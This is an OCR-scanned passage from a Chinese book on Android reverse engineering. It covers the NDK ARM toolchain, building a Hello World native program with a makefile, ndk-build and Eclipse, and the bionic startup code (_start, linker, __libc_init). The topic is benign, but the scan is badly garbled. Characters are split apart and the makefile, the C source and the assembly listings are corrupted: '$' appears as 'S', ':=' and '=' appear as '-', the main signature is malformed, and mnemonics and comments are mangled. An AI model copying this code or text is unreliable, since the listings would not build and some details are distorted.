器 支持 NEON 指令 集 ， 则 返回 的 64 位 数值 中 
ANDROID_CPU_ARM_FEATURE_NEON 标 志 就 会 被 置 位 ， 如 果 处 理 器 支 
持 VFPv3 指 令 集 ， 则 ANDROID_CPU_ARM_FEATURE_VFPv3 就 会 被 置 
位 。 

android getCpuCount 0 图 数 用 来 获取 处 理 器 的 核心 数 。 

NEON 与 VFP 在 分 析 Android NDK 程 序 时 很 少见 ， 因 此 ， 本 书 不 讨论 它 
们 的 内 容 ， 有 兴趣 的 读者 可 以 参看 ARM 官 方 的 指令 集 手册 。 


67 ”本 章 小 结 


本 章 主要 介绍 了 基于 Android 的 ARM 汇 编 语 言 基础 知识 。ARM 处 理 器 
完整 的 指令 集 系 统 比 较 庞 大 ， 笔 者 不 可 能 也 没有 必要 对 它们 一 一 进行 介 
绍 ， 再 三 苦 酌 后 挑选 了 一 些 在 分 析 Android NDK 程 序 时 常见 到 的 汇编 指令 进 
行 讲解 。 在 结束 本 章 的 学 习 后 ， 读 者 应 该 能 够 独立 的 阅读 一 般 的 ARM 汇 编 
代码 。 下 一 章 ， 我 们 将 介绍 如 何 静 态 分 析 Android NDK 原 生 程 序 。 


28729 Android NDK 程 序 逆向 分 析 


现 如 今 ，Android 平 台 下 的 软件 应 用 复杂 多 变 ， 仅 使 用 Android SDK 通 
过 Java 语 言 编 写 程序 已 经 不 能 满足 开发 者 了 ， 璧 如 : 音频、 视频 播放 软件 解 
码 器 的 编写 就 涉及 到 CPU 的 高 性 能 运算 ; 其 它 平 台 开 发 的 游戏 如 采用 C、 
C++ 编写 的 ， 则 因为 涉及 到 移植 而 可 能 面临 重 写 所 有 代码 ; 传统 的 Java 语 言 
编写 的 程序 容易 遭 到 逆向 破解 ， 需 要 一 种 新 的 代码 保护 手段 来 防御 攻击 
等 。 这 一 个 个 显著 的 需求 都 涌现 了 出 来 ， 为 了 解决 这 些 问题 ，Google 凭 借 
Java 语 言 的 JNI 特 性 为 开发 者 提供 了 Android NDK (Native Development 
Kit) 。 

Android NDK 直 译 为 “ 安 卓 原生 开发 套件 ”。 它 是 一 款 强大 的 工具 ， 可 以 
将 原生 C、C++ 代 码 的 强大 功能 和 Android 应 用 的 图 形 界面 结合 在 一 起 ， 解 决 
软件 的 跨 平台 问题 。 通 过 使 用 该 工具 ， 一 些 应 用 程序 能 直接 通过 JNI 调 用 与 
CPU 打交道 而 使 性 能 得 到 提升 。 同 时 ， 能 够 将 程序 的 核心 功能 封装 进 基 于 
“原生 开发 套件 ”的 模块 中 ， 从 而 大 大 提高 软件 的 安全 性 。 


7.41 _ Android 中 的 原生 程序 


Android NDK 从 R8 版 本 开始 ， 支 持 生 成 X86、MIPS、ARM 三 种 架构 的 
原生 程序 。 本 章 在 描述 时 ， 所 提 到 的 Android NDK 程 序 或 Android 原 生 程序 
均 表 示 以 Android NDK R8 与 ARM 架 构 处 理 器 为 基础 ， 使 用 C/C++ 代码 编写 
的 可 执行 程序 或 动态 链接 库 。 


711 编写 一 个 例子 程序 


f£ Android NDK R8 开 发 套件 中 ， 为 开发 人 员 提 供 了 一 组 开发 Android 
NDK 原 生 程 序 所 需 的 交叉 编译 工具 链 。 在 Windows 平 台 上 ， 如 果 Android 


NDK 安 装 在 D 盘 根 目 录 ， 那 么 工具 链 所 在 的 完整 路 径 为 *D:android-ndk- 
r8\toolchains\arm-linux-androideabi-4.4.3\prebuiltwindows\bin” 目 录 ， 这 些 工 
具 的 前 级 都 为 “arm-linux-androideabi”， 代 表 它 们 适用 于 ARM 架 构 的 Android 
程序 开发 ， 开 发 人 员 可 以 直接 使 用 它们 来 编写 Android 平 台 上 的 原生 应 用 程 
序 。 所 有 工具 的 使 用 方法 与 平时 在 windows 或 Linux 平 台 下 使 用 的 gcc 并 没有 
什么 区 别 ， 命 令 行 参数 也 基本 是 一 致 的 ， 只 是 应 用 平台 不 同 而 已 。 它 们 分 
别 是 : 

arm-linux-androideabi-addr2line.exe: 将 程序 地 址 转换 为 文件 名 和 行 号 。 

arm-linux-androideabi-arexe: 建立 、 修 改 、 提 取 归 档 文件 。 

arm-linux-androideabi-as.exe: gas 汇 编 器 。 

arm-linux-androideabi-c++.exe ; 工具 链 中 arm-linux-androideabi-g++.exe 
的 一 个 拷贝 。 

arm-linux-androideabi-c++filt.exe: 连接 器 使 用 它 过 滤 符 号 ， 防 止 重 载 孙 
数 冲突 。 

arm-linux-androideabi-cpp.exe: C++ 程序 编译 工具 。 

arm-linux-androideabi-g++.exe: C++ 程序 编译 工具 。 

arm-linux-androideabi-gcc-4.4.3.exe : 工具 链 中 arm-linux-androideabi- 
gcc.exe 的 一 个 拷贝 。arm-linux-androideabi-gcc.exe: C 程 序 编译 工具 。 

arm-linux-androideabi-gcov.exe: 程序 覆盖 度 测量 工 具 ， 记 录 代 码 的 执行 


arm-linux-androideabi-gdb.exe: 调试 工具 。 

arm-linux-androideabi-gprof.exe: 程序 性 能 测量 工具 。 

arm-linux-androideabi-ld.exe: 链接 器 ， 用 于 生成 可 执行 程序 。 

arm-linux-androideabi-nm.exe: 列 出 目标 文件 中 的 符号 。 

arm-linux-androideabi-objcopy.exe ; 复制 目标 文件 中 的 内 容 到 另 一 种 类 
型 的 目标 文件 中 。arm-linux-androideabi-objdump.exe: 输出 目标 文件 的 信 
Ri. 

arm-linux-androideabi-ranlib.eexe: 产生 归档 文件 索引 ， 并 将 其 保存 到 这 
个 归档 文件 中 。arm-linux-androideabi-readelf.exe: 显示 elf 格 式 可 执行 文件 的 


arm-linux-androideabi-run.exe: ARM 程 序 模拟 器 。 

arm-linux-androideabi-size.exe: 列 出 目标 文件 每 一 段 的 大 小 以 及 总 体 的 
大 小 。 

arm-linux-androideabi-strings.exe: 输出 目标 文件 的 可 打印 字符 串 。 

arm-linux-androideabi-strip.exe: 去 除 目 标 文 件 中 的 符号 信息 。 

了 解 了 这 些 工具 之 后 ， 我 们 来 编写 一 个 C 语 言 的 Hello World 程 序 ， 代 码 
如 下 : 


#include <stdio.h> 

int main(int argc, int** argv[])( 
printf("Hello ARM!'n"); 
return 0; 


) 


7.1.2. ”如 何 编译 原生 程序 


编译 生成 原生 程序 有 以 下 三 种 方法 : 
o 使 用 gcc 编 译 器 手动 编译 

e 使 用 ndk-build 工 具 手动 编译 

e 使 用 Eclipse 创建 工程 并 自动 编译 
下 面 我 来 对 这 三 种 方法 分 别 进行 讲解 。 


7.1.2.1 ”使 用 gcc 编 译 器 手动 编译 


使 用 gcc 编 译 原 生 程 序 需要 先 编写 makefile 文 件 ， 然 后 通过 gcc make 工 具 
进行 编译 。 在 Windows 平 台 下 编写 makefile 文 件 内 容 如 下 : 


NDK ROOT-D:/android-ndk-r8 

TOOLCHAINS ROOT-$(NDK ROOT)/toolchains/arm-linux-androideabi-4.4.3/prebui 
lt/windows 

TOOLCHAINS PREFIX-$(TOOLCHAINS ROOT)/bin/arm-linux-androideabi 

TOOLCHAINS INCLUDE-$ (TOOLCHAINS ROOT)/lib/gcc/arm-linux-androideabi/4.4.3/ 
include-fixed 

PLATFORM ROOT-$ (NDK ROOT)/platforms/android-14/arch-arm 

PLATFORM INCLUDE-$ (PLATFORM ROOT)/usr/include 

PLATFORM LIB-$ (PLATFORM ROOT)/usr/lib 

MODULE NAME-hello 

RM-del 


FLAGS--IS(TOOLCHAINS INCLUDE) \ 

-IS(PLATFORM INCLUDE) \ 

-LS(PLATFORM LIB) \ 

-nostdlib \ 

-lgcc \ 

-Bdynamic \ 

-lc 
OBJS-$ (MODULE, NAME).O \ 

S(PLATFORM LIB)/crtbegin dynamic.o \ 

S(PLATFORM LIB)/crtend android.o 
all: 

S(TOOLCHAINS PREFIX)-gcc S(FLAGS) -c S$(MODULE NAME).c -Oo 
$ (MODULE NAME).o 

S$(TOOLCHAINS PREFIX)-gcc S$(FLAGS) $(OBJS) -o S$(MODULE NAME) 
clean: 

$(RM) *.o 
install: 

adb push $ (MODULE NAME) /data/local/ 

adb shell chmod 755 /data/local/$ (MODULE, NAME) 


原生 程序 的 生成 过 程 分 成 两 个 步骤 : 第 一 步 将 hello.c 文 件 编译 成 hello.o 
目标 文件 ， 第 二 步 将 hello.o 目 标 文件 与 特定 的 原生 程序 启动 代码 及 依赖 库 进 
行 链接 最 终生 成 可 执行 文件 。 在 makefile 文 件 中 ，FLAGS 变 量 为 gcc 编 译 器 
的 命令 行 参数 增加 了 头 文件 与 库 文件 的 搜索 路 径 及 编译 选项 ，all 标 签 指 定 
了 编译 程序 时 所 需要 执行 的 命令 ，clean 标 签 用 于 清理 生成 的 目标 文件 ， 
install 标 签 将 生成 的 可 执行 文件 安装 到 模拟 器 或 手机 中 去 。 这 里 需要 说 明 的 
是 ，Android 并 没有 采用 glibc 作 为 C 库 ， 而 是 采用 了 Google 上 自己 开发 的 Bionic 
C 库 。 因 此 ， 编 译 选 项 中 需要 加 入 “-nostdlib”。 


交叉 工具 链 中 提供 的 makeexe 工 具 位 于 “D:'android-ndk- 
r8\prebuiltwindows\bin” 目 录 ， 在 编译 前 需要 将 这 个 路 径 加 入 到 系统 或 临时 
的 PATH 环境 变量 中 ， 然 后 将 hello.c 与 makefile 文 件 放 到 一 个 目录 ， 开 启 
Android 模 拟 器 或 将 开发 用 的 手机 连接 电脑 ， 完 成 这 些 工作 后 进入 命令 行 环 
境 依次 执行 以 下 命令 : 

make 

make install 

adb shell /data/local/hello 


可 以 看 到 执行 效果 输出 了 “Hello ARMI!”。 在 Windows 平 台 编 译 原 生 程 序 
就 完成 了 。Ubuntu 下 编译 程序 还 需要 修改 上 面 的 makefile 文 件 ， 调 整 Android 
NDK 目 录 的 路 径 ， 最 终 修改 完成 的 文件 名 为 makefile_ ubuntu， 在 终端 提示 
符 下 输入 “make -f makefile ubuntu” 会 与 Windows 平 台 上 输出 同样 的 结果 。 


注意 


尽管 使 用 交叉 工具 链 可 以 手动 编译 生成 原生 程序 ， 不 过 Android 官 方 的 建议 是 尽量 使 用 ndk-build 
来 完成 这 项 工作 ， 尤 其 是 在 移植 其 它 平台 应 用 程序 的 时 候 ， 会 避免 很 多 不 必要 的 麻烦 。 


7.1.2.2 ”使 用 ndk-build 编 译 


使 用 gcc 编 译 生 成 原生 程序 的 方法 比较 “原始 "，Android NDK 开 发 套件 
提供 了 一 个 ndk-build 工 具 ， 方便 开发 者 来 快速 地 生成 原生 程序 。 在 使 用 ndk- 
build 工 具 前 ， 需 要 先 有 一 个 Android 工 程 ， 这 个 工程 可 以 从 Android NDK 的 
samples 目 录 中 随便 复制 一 份 ， 也 可 以 使 用 Android SDK 开 发 包 tools 目 录 下 的 
android 脚 本 来 生成 。 下 面 我 们 使 用 android 脚 本 来 生成 一 个 Android 工 程 。 

android 脚 本 可 以 用 来 管理 AVD、Android 工 程 ， 完 整 的 命令 行 可 以 输入 
“android --help” 查 看 ， 这 里 需要 使 用 到 它 的 “create project”" 选 项 ， 首 先 在 命令 
行 下 输入 “android list”, XAM S AIH Android SDK 中 所 有 已 经 安装 的 
SDK 平 台 的 版 本 ， 在 第 1 章 中 我 们 已 经 完成 了 Android SDK 的 安装 ， 这 里 成 
功 执 行 的 话 会 输出 下 面 类 似 的 结果 。 


id: 7 or "android-10" 
Name: Android 2.3.3 
Type: Platform 
API level: 10 
Revision: 2 
Skins: HVGA, QVGA, WQVGA400, WQVGA432, WVGA800 (default), WVGA854 


ABIS : armeabi 


使 用 “android list” 列 出 所 有 SDK 平 台 版 本 后 ， 选 择 其 中 一 个 作为 项 目的 
平台 版 本 号 ， 这 里 选择 android-10 表 示 生 成 Android 2.3.3 的 工程 。 接 下 来 创 
建 Android 工 程 ， 输 入 以 下 命令 : 


android create project -n hello2 -p hello2 -t android-10 -k com.droider.hello2 
-a MyActiviry 


命令 行 的 解释 如 下 :“-n> 指 定 Android 工 程 的 名 称 ,，“-t 指 定 生成 Android 
工程 所 需要 使 用 的 平台 版 本 号 ， 也 就 是 android list 列 出 的 版 本 号 之 一 ，“-p” 
指定 生成 工程 的 目录 名 ，“-k” 指 定 Android 工 程 的 包 名 ，“-a” 指 定 默认 
Activity 的 名 称 , "android create project” 会 根据 默认 Activity 文 件 名 自动 生成 
相应 的 java 文 件 ， 并 生成 AndroidMenifest.xml。 执 行 完 以 上 命令 ， 最 终 的 效 
果 如 下 所 示 。 


android create project -n hello2 -p hello2 -t android-10 -k com.droider.hello2 
-a MyActiviry 

libMhttpmime-4.1.1.jar 

已 复制 ITXW. 

Created project directory: D: NworkspaceNchapter7NM7.1M7.1.2MXhel1102 

Created directory D:\workspace\chapter7\7.1\7.1.2\hello2\src\com\droider\ 
hello2 
Added file D: NworkspaceNchapter7N7.1M7.1.2Mhello2MsrcNcomNMdroiderMhello2*N 
MyActiviry.java 
Created directory D: workspace Nchapter7M7.1M7.1.2Mhello2 res 
Created directory D: workspaceNchapter7M7.1M7.1.2Mhello2Mbin 
Added file D: workspaceNchapter7N7.1M7.1.2Mhello2Mbuild.xml 

Added file D: workspaceNchapter7M7.1M7.1.2Mhello2Mproguard-project.txt 


Android 工 程 生 成 好 了 。 下 一 步 在 工程 的 根 目 录 下 新 建 一 个 jni 文 件 夹 ， 
并 将 hello.c 文 件 复制 进去 。 接 着 编写 ndk-build 所 需要 的 脚本 文件 ，ndk-build 


使 用 Android.mk 与 Application.mk 作 为 它 的 脚本 文件 ， 其 中 Application.mk 文 
件 是 可 选 的 ， 用 来 描述 原生 程序 本 身 使 用 到 的 一 些 特 性 ， 如 原生 程序 支持 
的 ARM 人 硬件 指令 集 、 工 程 编译 脚本 、STL 支 持 等 ， 我 们 在 后 面 的 章节 中 会 
用 到 它 ; Android.mk 文 件 是 工程 的 编译 脚本 ， 摘 述 了 编译 原生 程序 所 需 的 编 
译 选 项 、 头 文件 、 源 文件 及 依赖 库 等 。 本 例 不 需要 使 用 Application.mk， 编 
写 Android.mk 文 件 内 容 如 下 : 


LOCAL PATH := S(call my-dir) 
include S(CLEAR VARS) 
LOCAL, ARM, MODE :- arm 

LOCAL MODULE := hello 
LOCAL SRC FILES :- hello.c 


include S$(BUILD, EXECUTABLE) 

一 个 Android.mk 文 件 由 若干 条 定义 语句 组 成 。 下 面 看 看 它们 每 一 行 的 具 
体 作 用 : 

LOCAL PATH := $ (call my-dir) 

LOCAL_PATH 定 义 了 本 地 源码 的 路 径 ， 它 是 Android.mk 文 件 中 必须 首 
先 定 义 好 的 变量 ，call my-dir 指 定 了 调用 my-dir 宏 ， 它 是 由 编译 系统 提供 
的 ， 返 回 Android.mk 文 件 本 身 所 在 的 路 径 。 一 般 与 源码 文件 目录 相同 。 

include $ (CLEAR VARS) 

CLEAR_VARS 指 定 让 编译 系统 清除 掉 一 些 已 经 定义 过 的 宏 ， 这 些 宏 的 
定义 都 是 全 局 的 。 如 LOCAL_MODULE、LOCAL_SRC_FILE， 当 一 个 GUN 
MAKE 在 编译 多 个 模块 时 ， 必 须 清 除 并 重新 设置 它们 。 

LOCAL ARM MODE := arm 

LOCAL_ARM_MODE 指 定 生成 的 原生 程序 所 使 用 的 ARM 指 令 模 式 。 
arm 表 示 使 用 32 位 的 arm 指 令 系 统 。 

LOCAL MODULE := hello 

LOCAL_MODULE 指 定 模块 的 名 称 ， 即 原生 程序 生成 后 的 文件 名 。 这 
里 最 终 将 生成 名 为 hello 的 文件 ， 如 果 生 成 共享 库 模 块 ， 将 会 生成 
libhello.soo 


LOCAL SRC FILES :- hello.c 


LOCAL_SRC_FILES 指 定 C 或 Ct++ 源 文件 列表 。 这 里 只 有 一 个 hello.c 文 
件 。 


include $ (BUILD EXECUTABLE) 


指定 生成 的 文件 类 型 。BUILD_EXECUTABLE 表 示 生 成 可 执行 文件 ， 
BUILD SHARED LIBRARY 表示 生成 动态 库 ，BUILD_STATIC_LIBRARY 
表示 生成 静态 库 。 

Android.mk 文 件 编写 完毕 后 ， 将 它 与 hello.c 文 件 放 到 jni 同 一 目录 下 ， 然 
后 在 命令 行 下 进入 hello2 工 程 目录 ， 输 入 ndk-build 命 令 就 会 在 libsarmeabi 目 
录 下 生成 hello 可 执行 文件 ， 执 行 效果 如 下 所 示 。 

ndk-build 

Pass 

android-10false 

D:/android-ndk-r8/toolchains/arm-linux-androideabi-4.4.3/prebuilt/windows 

/bin/../lib/gcc/arm-linux-androideabi/4.4.3/libgcc.a 


D:/android-ndk-r8/toolchains/arm-linux-androideabi-4.4.3/prebuilt/windows 


/bin/../lib/gcc/arm-linux-androideabi/4.4.3/libgcc.a 


"Compile arm : hello «- hello.c 

Executable : hello 

Install : hello => libs/armeabi/hello 
已 复制 1 外 文件 


将 hello 复 制 到 模拟 器 或 手机 中 ， 执 行 效果 与 使 用 gcc 编 译 器 手动 编译 是 
一 样 的 。 


7.1.2.3 ”使 用 Eclipse 创建 工程 并 自动 编译 


使 用 Eclipse 自动 编译 原生 程序 的 原理 依旧 是 使 用 ndk-build 工 具 ， 但 自动 
化 的 操作 会 使 得 开发 原生 程序 更 加 高 效 。 打 开 Eclipse， 新 建 一 个 Android 工 
程 ， 取 名 为 hello3， 其 它 选项 保持 默认 ， 不 停 点 击 下 一 步 完 成 创建 。 在 工程 
中 新 建 jni 目 录 ， 然 后 将 hello.c 与 Android.mk 文 件 导 入 ， 也 可 以 直接 将 hello2 
工程 的 jni 目 录 拷 贝 到 hello3 工 程 目录 ， 然 后 在 Eclipse 中 的 hello3 工 程 上 按 F5 
刷新 工程 。 


下 面 新 建 一 个 Build， 当 我 们 在 编写 代码 时 保存 修改 后 ，Edlipse 会 自动 
为 我 们 编译 生成 原生 程序 。 在 hello3 工 程 上 右键 选择 Properties ， 点 击 
Builders 选 项 ， 再 点 击 Builders 选 项 页 右 侧 的 New 按 钮 ， 然 后 双击 Program 项 
打开 Edit Configuration 对 话 框 ， 在 对 话 框 的 Name 一 栏 设置 Builder 的 名 称 ， 
这 里 输入 “JNI Builder" , 在 Location 一 栏 Pu A *$[env var: 
ANDROID NDKJ/ndk-build.cmd" 3& E Æ H f; BJ db € , ra d Working 
Drrectory 右 侧 的 Browse Workspace 按 钮 选择 hello3 工 程 ， ME At ApplyA 
应 用 更 改 ， 操 作 完 后 效果 如 图 7-1 所 示 。 


É- Edit Configuration 


Edit launch configuration properties 
Create a configuration that will run a program during builds 


Name: JNI Builder 
[7] Main Vm Refresh B Environment | [— Build Options 
Location: 


$ienv_var: ANDROID NDK]/ndk-build. cmd 


Browse Workspace... Browse File System... Variables... 


Working Directory: 
$ workspace loc:/hello3] 


Note: Enclose an argument containing spaces using double-quotes (^). 


图 7-1 配置 JNIL_Builder 选 项 


单 击 Refresh 标 签 ， 勾 选 “Refresh resources upon completion” 复 选 框 。 
单 击 Build Options 标 签 ， 勾 选 “During auto builds” 复 选 框 ， 勾 选 “Specify 
working set of relevant resources” 复 选 框 ， 点 击 “Specify Resources” 按 钮 ， 勾 


选 hello3 工 程 的 jni 目 录 ， 上 点击 Finish 按 钮 ， 点 击 OK 按 钮 关闭 Edit 
Configuration 对 话 框 。 

点 击 OK 按 钮 关闭 Properties 对 话 框 。 这 时 hello3 工 程 就 会 自动 编译 ， 最 
后 在 libs/armeabi 目 录 下 生成 hello 可 执行 文件 ， 效 果 如 图 7-2 所 示 。 并 且 以 后 
在 Eclipse 中 对 jni 目 录 下 的 任何 文件 进行 修改 保存 操作 ， 都 会 触发 
JNI. Builder 执 行 来 重新 编译 工程 。 


f- Java — hello3/jni/Android.mk — Eclipse 
File Edit Refactor Navigate Search Project Eun Window Help 


nog uv Gad $5*0-Q* w sS G* 


I$ Package Explorer 23 © Android. mk 23 
# Licensed under the Apache License, Version 2.0 (the "License"); 
# you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at 


# 
# http://www.apache.org/licenses/LICENSE-2.0 
# 


# Unless required by applicable law or agreed to in writing, software 
# distributed under the License is distributed on an "AS IS" BASIS, 
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
# See the License for the specific language governing permissions and 
# limitations under the License. 
# 
LOCAL PATH := {call my-dir 
$(CLEAR VARS) 


LOCAL ARM MODE :- arm 

LOCAL MODULE := hello 

LOCAL SRC FILES := hello.c 
$(BUILD EXECUTABLE) 


X, AndroidManifest. xml 
Cl AndroidMani fest. xml 
[E] proguard-project. txt 
B project. properties 


|i; Problems @ Javadoc B Declaration [E] Console 7 * E E UA [ers Ei” 
Sterminated> JNI Builder [Program] C:\android-ndlk-rB\ndk-build. cmd 
"Compile arm : hello <= hello.c 


Executable : hello| 


Install : hello => libs/armeabi/hello 


7-2 ”使 用 Eclipse 自动 编译 生成 原生 程序 


7.2 ”原生 程序 的 启动 流程 分 析 


很 多 人 认为 main 冰 数 是 程序 的 入 口 遂 数 ， 其 实 不 然 ， 在 程序 启动 过 程 
中 ，main 国 数 开始 前 ， 需 要 做 一 些 初 始 化 的 工作 ， 如 动态 库 的 加 载 、 程 序 
的 参数 argc 和 argv 的 初始 化 等 。 


7.2.1 ”原生 程序 的 入 口 函 数 


原生 程序 有 静态 链接 与 动态 链接 两 种 ， 其 中 动态 链接 又 分 为 动态 链接 
程序 与 动态 链接 库 。 

静态 链接 需要 在 gcc 编 译 器 的 命令 行 参数 中 指定 -Bstatic， 在 生成 可 执行 
程序 时 会 链接 crtbegin_static.o 与 crtend_android.o 目 标 文 件 ，crtbegin_static.o 
文件 中 定义 了 静态 链接 程序 的 启动 汶 数 _start， 这 个 函数 是 程序 启动 时 执行 
的 第 一 个 函数 。 静 态 链接 的 程序 在 启动 时 不 需要 额外 的 加 载 其 它 的 动态 
库 ， 这 类 程序 相对 较 少 ， 已 知 的 有 Android 系 统 中 的 init、adbd、1linker 等 程 
序 。 

动态 链接 需要 在 gcc 编 译 器 的 命令 行 参数 中 指定 -Bdynamic， 在 生成 可 执 
行程 序 时 会 链接 crtbegin_dynamic.o 与 crtend_android.o 目 标 文 件 ， 并 且 动 态 链 
接 时 需要 通过 “--dynamic-linker 人 参数 指定 程序 的 “加 载 器 ”， 默 认为 
“/systemybinmlinker"。 在 生成 的 可 执行 程序 中 ， 每 个 程序 都 会 包含 一 个 
“.interp” 段 来 存 入 程序 的 “加 载 器 ”。 动 态 链接 程序 的 启动 函数 _start 位 于 
crtbegin_dynamic.o 文 件 中 ， 目 前 该 文件 的 实现 与 静态 链接 的 crtbegin_static.o 
文件 完全 相同 ， 也 就 是 说 ， 静 态 链接 与 动态 链接 有 着 相同 的 启动 水 数 。 

其 实 无 论 是 动态 链接 还 是 静态 链接 Android 原 生 程序 ， 在 链接 时 都 会 传 
入 一 个 链接 脚本 ， 根 据 链接 时 指定 参数 的 不 同 ， 所 传 入 的 链接 脚本 也 不 一 
样 ， 所 有 的 链接 脚本 位 于 Android NDK 的 toolchains\arm-linux-androideabi- 
4.4.3Wprebuiltwindows arm-linux-androideabiVibWdscripts E R P, EA 3A Ti H 
下 ， 链 接 时 会 传 入 armelf linux_eabi.x 脚 本 文件 ， 该 文件 的 第 五 行 代码 
“ENTRYL_star0” 指 出 程序 入 口 国 数 为 _start， 也 就 是 上 面 crtbegin_dynamic.o 
与 crtbegin_static.o 文 件 中 的 _start 国 数 ， 它 们 的 源码 分 别 位 于 Android 4.0 源 码 
bioniclibcvarch-armvbionic 目 录 下 的 crtbegin_dynamic.S 与 crtbegin_static.S 文 件 
中 (Android 4.1 源码 中 已 经 去 除 ) 。 打 开 crtbegin static.S 或 
crtbegin_dynamic.S 文 件 ， 代 码 如 下 : 


d .text 8@ 声 明代 码 段 
2 .align 4 @ 对 齐 方式 为 2^4=16 字 节 
3 .type _start,#function @_start 为 函数 
4 .globl start @ 声 明 _start 标 识 符 
5 
6. „Btart: 
7 mov r0, sp @ 取 堆栈 指针 
8 mov rl, #0 er1 = 0 
9 adr. x2; OE e 标 号 0 地 址 ， 即 执行 main 函 数 的 指针 
10 adr r3, 1f @ 标 号 1 地 址 ， 即 数组 指针 
11 b - libc init QjÀÍT  libc init 
12 
13 0: b main @ 执 行 main 
14 
15 1: .long __PREINIT ARRAY . @4 个 标号 地 址 
16 .long . INIT ARRAY . 
17 .long ., FINI ARRAY . 
18 Jong -STOR DIST . 
19 
20 .Section .preinit array, "aw" ejilliboreinit array 
21 .globl | PREINIT ARRAY . 
22 . PREINIT ARRAY : 
23 .long -1 
24 
25 .Section .init array, "aw" Qjillinit array 
26 .globl INIT ARRAY . 
27 _ INIT ARRAY .: 
28 .long -1 
29 
30 .Section .fini array, "aw" Gjillüi£ini array 
31 .globl | FINI ARRAY . 
32 . FINI ARRAY .: 
33 .long -1 
34 
35 .Section .ctors, "aw" @ 声 明 ctors 
36 .globl | CTOR LIST . 
37 . CTOR.BIST:. % 
38 .long -1 
39 


40 $include " Jdso handle.S" 
41 dinclude "atexit.S" 


1-4 行 声明 了 _start 国 数 以 及 代码 对 齐 方式 。 


5-14 行 调用 了 __libc_init 国 数 ， 传 递 了 4 个 参数 。 分 别 是 堆栈 指针 、 数 值 
0、 执 行 main 遂 数 的 指针 与 4 个 段 数 组 的 指针 。 

15-18 行 保存 了 4 个 数组 段 地 址 。 

19-39 行 声明 了 4 个 数组 段 ， 每 个 数据 段 声 明了 一 个 全 局 标 符 符 ， 并 都 只 
有 一 个 long 类 型 值 为 -1。 

40-41 行 包含 了 其 它 两 个 汇编 文件 ， 有 具体 就 不 再 跟 入 了 。 

对 于 静态 链接 的 程序 来 说 ， 上 面 这 段 代 码 的 确 就 是 它 的 启动 函数 了 ， 
但 动态 链接 的 程序 却 没有 这 么 简单 ， 动 态 链接 的 程序 在 运行 前 还 需要 做 一 
些 初始 化 工作 ， 如 程序 运行 所 依赖 的 动态 库 需 要 先 被 载 入 内 存 。 这 项 工作 
是 由 前 面 介 绍 的 程序 “加 载 器 ”来 完成 的 。 当 通过 execve 执 行 一 个 动态 链接 的 
程序 时 ，Android 系 统 内 核 会 解析 这 个 ELF 文 件 ， 先 找到 程序 的 解释 器 ， 一 
般 是 /system/bim/linker， 然 后 执行 linker， 最 后 由 linker 调 用 真正 的 可 执行 程 
序 的 代码 。 

前 面 曾 说 过 ， 静 态 链 接 的 程序 的 启动 代码 位 于 crtbegin_static.o 目 标 文件 
中 ，linker 虽 然 是 静态 链接 程序 ， 但 它 的 启动 函数 并 不 在 它 里 面 ， 在 Android 
源码 的 bionic\linker\Android.mk 文 件 中 ，linker 指 定 了 自己 的 启动 疯 数 所 在 的 
文件 begin.S， 该 文件 代码 如 下 : 


1 .text 

2 .align 4 

3 .type  start,$function ee 声明 start KH% 

4 .globl start 

5 

6 start: 

7 mov r0, sp @r0 指 向 堆栈 指针 

8 mov rl, $0 

9 bl J linker init QidH] linker initi 

10 

11 /* linker init returns the entry address in the main image */ 
12 mov pc, r0 @ 执 行 ” 1inker_init 返 回 的 代码 , 即 程序 入 口 
13 

14 .section .ctors, "wa" 

15 .globl CTOR LIST 

16 CTOR LIST 

17 .long -1 


linker 调 用 _linker_init 函 数 来 进行 初始 化 工作 ， 初 始 化 完毕 后 会 返回 原 
生 程序 的 入 口 到 r0， 最 后 将 r0 赋 值 给 pc 跳 转 到 真正 的 程序 入 口 去 执行 。 
_ linker_init 代 码 位 于 Android 系 统 源码 目录 下 的 bionic\inkerlinker.c 文 件 中 ， 
它 的 代码 比较 长 ， 我 就 不 列 出 来 了 ， 具 体 的 工作 是 设置 TLS、 初 始 化 环境 函 
数 、 加 载 可 执行 文件 、 加 载 所 需 的 动态 库 、 解 析 符 号 等 ， 完 整 的 实现 代码 
读者 可 以 参看 linkerc 文 件 。_jlinker_init 国 数 执行 完 后 ， 会 返回 被 执行 程序 
的 入 口 地 址 ， 也 就 是 动态 链接 程序 自身 的 _start 孙 数 地 址 ， 最 后 调用 “mov 
pc, r0? 跳 转 过 去 执行 ， 接 下 来 的 执行 过 程 就 与 静态 链接 相同 了 。 讲 到 这 里 ， 
我 们 来 整理 一 下 思路 : 静态 链接 与 动态 链接 程序 的 入 口 函 数 相 同 ， 动 态 链 
接 的 程序 在 执行 入 口水 数 前 需要 通过 linker 进 行 额外 的 初始 化 。 

动态 链接 还 包含 一 类 文件 ， 那 就 是 动态 链接 库 。 在 生成 动态 链接 库 时 
会 链接 crtbegin_so.o 与 crtend_ so.o 目 标 文 件 ， 并 且 传 入 的 链接 脚本 为 
armelf linux eabixsc o  crtbegin so.o 的 源码 位 于 Android 4.0 源码 
bionic\libc\arch-arm\bionic El 3€ 下 的 i so.S X fF FH. ( Android 4.1 为 
crtbegin so.c) ， 它 的 代码 只 是 定义 了 一 个 _、on_ dlcloseQ EKZ ,— ZAAR 
— cxa finalize(& — dso handle)", ux doc 被 加 载 或 卸载 时 ， 

函数 都 会 被 调 有 用， 换言之， 该 玫 数 就 是 动态 链接 库 的 入 口 函 数 。 
__cxa_finalize0 国 数 的 代码 位 于 Android 源 码 的 bioniclibcstdlibvatexit.c 文 件 
中 ， 该 水 数 使 用 call_depth 维 护 了 一 个 引用 计数 ， 当 动态 链接 库 被 加 载 时 ， 
它 的 值 自 增 一 ， 当 动态 链接 库 被 卸载 时 ， 它 的 值 自 减 一 ， 当 引用 计数 为 零 
时 ， 函 数 调 用 munmap0 释 放 动 态 链接 库 占 用 的 内 存 页 。 


7.2.2 ”main 冰 数 究竟 何 时 被 执行 


究竟 main 陨 数 是 在 何 时 被 执行 的 呢 ? 我 们 查看 _libc_init 国 数 的 代码 来 
寻找 答案 。 静 态 链 接 与 动态 链接 的 _libc_init 函 数 的 实现 代码 不 同 ， 静 态 链 
接 程 序 的 _ jibcinit K ğe R B W F Android 源码 目录 下 的 
bioniclibc\bioniclibc_init_static.c 文 件 中 ， 代 码 如 下 : 


1 | noreturn void | libc init(uintptr t *elfdata, 

2 void (*onexit) (void), 

3 int (*slingshot) (int, char**, chbar**), 

4 structors array t const * const structors) 
5 t 

6 int argc; 

